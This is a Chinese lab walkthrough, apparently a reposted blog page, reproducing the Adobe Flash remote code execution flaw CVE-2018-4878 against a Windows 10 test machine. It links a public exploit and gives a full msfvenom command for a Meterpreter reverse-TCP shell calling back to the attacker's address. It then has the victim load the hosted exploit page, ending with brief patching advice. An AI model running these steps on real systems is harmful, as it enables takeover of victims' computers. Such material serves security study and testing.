Adboe Flash遠程代碼執行_CVE-2018-4878漏洞復現

Adboe Flash遠程代碼執行_CVE-2018-4878漏洞復現html

1、漏洞描述python

該漏洞可針對windows用戶發起定向攻擊。攻擊者能夠誘導用戶打開包含惡意Flash代碼文件的Microsoft Office文檔、網頁、垃圾電子郵件等。git

2、漏洞影響版本github

Flash Player版本28.0.0.137以及以前的全部版本web

  

3、漏洞復現環境搭建shell

攻擊機:kali   ip:192.168.10.136windows

靶機:win10   ie默認集成flash,沒有升級tcp

4、漏洞復現spa

1.github下載exp, https://github.com/anbai-inc/CVE-2018-4878code

2.修改exp

2.1修改shellcode爲本身生成的反彈鏈接shellcode,首先先生成反彈鏈接shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.136 lport=8888 -f python >/root/shellcode.txt

  

2.2用生成的shellcode替換exp中對應的shellcode

  

2.3修改exp中生成文件保存的路徑

  

3.運行python腳本,會生成兩個文件, exploit.swf和index.html

4.把exploit.swf和index.html複製到/var/www/html,而後開啓web服務, 此時,Kali Linux上Web服務啓動,而且具有index.html這個頁面。只要靶機啓用flash並訪問了這個頁面,則能夠直接被控制

5.kali 開啓監聽

  

6.靶機訪問http://192.168.10.136/index.html

  

7.此時kali端已經獲取到會話

  

5、漏洞防護

1.下載最新版本的Adobe Flash

2.安裝常見殺毒軟件,開啓實時防禦和殺毒引擎實時升級

相關文章
相關標籤/搜索